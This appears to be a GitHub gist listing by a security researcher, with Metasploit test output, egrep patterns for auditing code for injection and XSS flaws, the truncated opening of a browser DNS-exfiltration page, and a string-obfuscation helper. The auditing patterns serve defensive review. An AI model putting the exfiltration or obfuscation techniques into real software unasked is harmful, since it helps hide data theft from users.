Skip to content

Instantly share code, notes, and snippets.

View nstarke's full-sized avatar

Nicholas Starke nstarke

View GitHub Profile
rspec ./spec/lib/msf/util/exe_spec.rb:65 # Msf::Util::EXE.to_executable_fmt with platform=linux returns an executable when given arch=mipsbe, fmt=elf
rspec ./spec/lib/msf/util/exe_spec.rb:65 # Msf::Util::EXE.to_executable_fmt with platform=linux returns an executable when given arch=mipsle, fmt=elf
rspec ./spec/lib/rex/socket/range_walker_spec.rb:29 # Rex::Socket::RangeWalker.new with an invalid hostname should not be valid
rspec ./spec/lib/rex/socket/range_walker_spec.rb:34 # Rex::Socket::RangeWalker.new with an invalid hostname and CIDR should not be valid
Failure/Error: verify_bin_fingerprint(format_hash, bin)
expected: /ELF 32-bit MSB executable, MIPS/
got: "/dev/stdin: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, corrupted section header size\n" (using =~)
Diff:
@@ -1,2 +1,2 @@
@nstarke
nstarke / gist:11306563
Last active August 29, 2015 14:00
Gemfile.lock-diff
--- ../Gemfile.lock 2014-04-25 21:35:15.353280736 +0000
+++ Gemfile.lock 2014-04-25 23:05:47.249280736 +0000
@@ -1,27 +1,27 @@
GEM
remote: https://rubygems.org/
specs:
- activemodel (3.2.14)
- activesupport (= 3.2.14)
+ activemodel (3.2.17)
+ activesupport (= 3.2.17)
@nstarke
nstarke / gist:aabe781c6967a7f03adb
Created January 12, 2015 01:50
openvas-report-import-msf-error
msf > openvas_report_import 1 11
[*] Importing report to database.
[-] Error while running command openvas_report_import: getaddrinfo: Name or service not known
Call stack:
/home/nick/metasploit-framework/lib/rex/socket.rb:181:in `gethostbyname'
/home/nick/metasploit-framework/lib/rex/socket.rb:181:in `getaddresses'
/home/nick/metasploit-framework/lib/rex/socket.rb:165:in `getaddress'
/home/nick/metasploit-framework/lib/msf/core/db_manager/host.rb:93:in `normalize_host'
/home/nick/metasploit-framework/lib/msf/core/db_manager/host.rb:160:in `block in report_host'
<report content_type='text/xml' extension='xml' format_id='a994b278-1f62-11e1-96ac-406186ea4fc5' id='7fa042b4-55ee-4ece-a647-7f2288e24b5c' type='scan'><owner><name/></owner><name>2015-01-12T01:24:46Z</name><comment/><creation_time>2015-01-12T01:24:46Z</creation_time><modification_time>2015-01-12T01:32:42Z</modification_time><writable>0</writable><in_use>0</in_use><report id='7fa042b4-55ee-4ece-a647-7f2288e24b5c'><report_format/><sort><field>type<order>descending</order></field></sort><filters id='0'><term>sort-reverse=ROWID result_hosts_only=1 min_cvss_base= levels=hmlgd autofp=0 notes=0 overrides=0 first=1 rows=-1 delta_states=cgns</term>hmlgd<phrase/><autofp>0</autofp><notes>0</notes><overrides>0</overrides><apply_overrides>0</apply_overrides><result_hosts_only>1</result_hosts_only><min_cvss_base/><filter>High</filter><filter>Medium</filter><filter>Low</filter><filter>Log</filter><filter>Debug</filter></filters><severity_class id='d4c74cda-89e1-11e3-9c29-406186ea4fc5'><name>nist</name><full_name>NVD Vulnera
@nstarke
nstarke / emberjs-egrep-unsafe-handlebars-parameters.sh
Last active August 29, 2015 14:25
EmberJS one-liner to find unsafe handlebars parameters
# searches for {{{ or }}} in all .handlebars or .hbs files
# {{{ and }}} signify unsafe template parameters in EmberJS
# tested on OS X 10.10
egrep -r --include "*.handlebars" --include "*.hbs" "\{\{\{|\}\}\}" .
@nstarke
nstarke / CSharp-Vulnerability-Egrep.sh
Last active December 5, 2015 17:39
Egrep commands to find security vulnerabilities and perform security audits on CSharp code. Useful for penetration testers operating in a Microsoft / CSharp environment.
# Returns instances where anti xss measures are deployed
egrep -r --include "*.cs" -e "(AntiXssEncoder|Server\.HtmlEncode|Html.Encode)" .
# Returns possible command injection areas
egrep -r --include "*.cs" -e "(Process|Process\.Start)\(" .
# Returns possible xss scenarios (string concatention in HTML/XML)
egrep -r --include "*.cs" -e "<.*>\"\s*\+.*\+\s*\"<.*>" .
# Returns places where anti csrf measure are deployed
@nstarke
nstarke / c-cpp-egrep.sh
Created February 27, 2016 18:16
C and C++ Egrep
# see all character arrays of any hardcoded length
egrep --include "*.c*" -rnI -e 'char\s+[a-zA-Z0-9]+\[\d+\]' .
@nstarke
nstarke / php-vulnerability-egrep.sh
Last active October 4, 2016 22:15
PHP Vulnerability egrep
# this command searches all PHP files in a directory for vulnerable shell functions
egrep -r --include "*.php" -e "(system|exec|popen|pcntl_exec|proc_open)\(" .
# this command searches all PHP files in a directory for certain vulnerable php execution functions
egrep -r --include "*.php" -e "(eval|assert|preg_replace)\(" .
# this command returns instances where variables are echoed out without htmlspecialchars()
# it can be useful for finding XSS vulnerabilities in PHP code
egrep -r --include "*.php" -e "echo\s*\\$.*;" .
@nstarke
nstarke / bacon-ipsum.html
Last active January 14, 2017 03:48
Browser Based DNS Exfil
<!DOCTYPE html>
<html style="width:100%;height:100%;">
<head>
<title>DNS-Exfil.js</title>
<script>
var targetId = Math.round(Math.random() * 1000000);
var sessionId = guid();
function doRequest(){
@nstarke
nstarke / simple-js-obfuscation.js
Created July 23, 2015 20:21
simple js obfuscation
function rewrite(text) {
var obs = "";
for (var i = 0; i < text.length; i++) {
obs += "(function() { return String.fromCharCode(" + text[i].charCodeAt(0) + "); })() + ";
}
obs += ' ""';
return obs;
}
var n = rewrite('console.log("test")');